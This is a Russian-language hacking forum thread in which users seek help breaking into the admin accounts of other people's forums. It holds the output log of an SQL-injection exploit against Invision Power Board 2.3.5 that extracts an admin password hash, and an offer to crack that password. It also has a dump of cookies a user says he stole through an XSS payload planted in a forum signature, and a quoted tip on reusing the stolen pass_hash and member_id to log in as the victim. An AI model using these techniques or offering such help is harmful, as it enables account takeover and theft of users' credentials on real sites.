[Помогите!] Взло адмики

[sunches]

Нашел один форум делал все по гайду по взлому l2europe.
Суть в том что слишком долго ищет хеш

Invision Power Board <= 2.3.5 Mult
----------------------------------
Update by Elekt version 1.5 ::[TUR

Attack(s):

+ [17.06.2010 16:16:24]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 1
/ Trying to get the password hash
/ pass_hash=d4f77c5c
это всего за 30 минут,как можно увеличить скорость подборки хеша?

[jumper_ua(1)]

ты хеш не подбирал ты его только получил, подобрать значит взломать.
почему так медленно - к серверу пинг большой или же маленькая скорость интернета, или лаги на сайте/форуме.
напиши ЛС адрес форума, я попробую подобрать пароль.
так как надо знать шифрацию, это вроде бы MD5, хот не исключение что MYSQL
короче надо смореть по кодировке

[SyavaK]

знающие подскажите, вот своровал куки

06.08.2011 17:52:10 +02:00 []
IP: 79.117.119.143
QUERY:

__utma=201464641.518704701.1305995037.1312470580.1 312640219.156;
__utmz=201464641.1310993025.126.39.utmcsr=xxxxxxxx xxxx|utmccn=(referral)|utmcmd=referral|utmcct=/awrss.php;
__utma=23605695.638383052.1305995046.1312640231.13 12642247.146;
__utmz=23605695.1312642247.146.142.utmcsr=xxxxxxxx xxxx|utmccn=(referral)|utmcmd=referral|utmcct=/;
ipb_stronghold=d7099fe370faa0cdc2e7cb6ef0c053b0;
forum_read=a:16:{i:28;i:1310647116;i:4;i:130657209 5;i:38;i:1306572098;i:3;i:1310369810;i:29;i:131036 9810;i:17;i:1310369810;i:44;i:1310369810;i:48;i:13 10369810;i:47;i:1310369810;i:45;i:1310369810;i:35; i:1310369810;i:68;i:1310369810;i:65;i:1310369810;i :2;i:1310647116;i:67;i:1312187576;i:36;i:131064711 9;};
rte-sidepanel=open;
member_id=1058;
pass_hash=406b2fa2db93c32367bbd4dd7d4299a3;
nobot=1;
__utmc=201464641;
session_id=54a65a9d255007e13a8e64789f45248a;
__utmc=23605695;
topicsread=a:3:{i:5337;i:1312642248;i:2041;i:13126 42251;i:5324;i:1312642256;};
__utmb=23605695.3.10.1312642247
REFERER: xxxxxxxxxxx
AGENT: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0

можна ли с них выдрать пароль:логин
и что вообще я смогу сделать с такими куками
заранее спасиб

[Excellent18rus]

зависит от того где ты взял эти куки..
member_id=1058; ид пользователя
pass_hash=406b2fa2db93c32367bbd4dd7d4299a3; - зашифрованный пароль

[SyavaK]

я на одном форуме вставил в подпись чтото типа

[acronym=test1[acronym=test2 onmouseover=*******...);]test1]test2[/acronym]test1[/acronym]


прочитал в инете вот такое


Значение pass_hash это не зашифрованный пароль юзера!!! а одноименное значение из кукиса с
помощью которого можно войти на форум под любым юзером без ввода пароля.
member_id это также одноименное значение из кукиса.
Поэтому не стоит пытаться расшифровать pass_hash =) Просто зарегистрируйтесь на форуме и измените
pass_hash и member_id в вашем cookie на одно из значений которые выдаст сплоит.

вот и задумался стоит ли пытатся розшифровать хеш, будет ли какойнить толк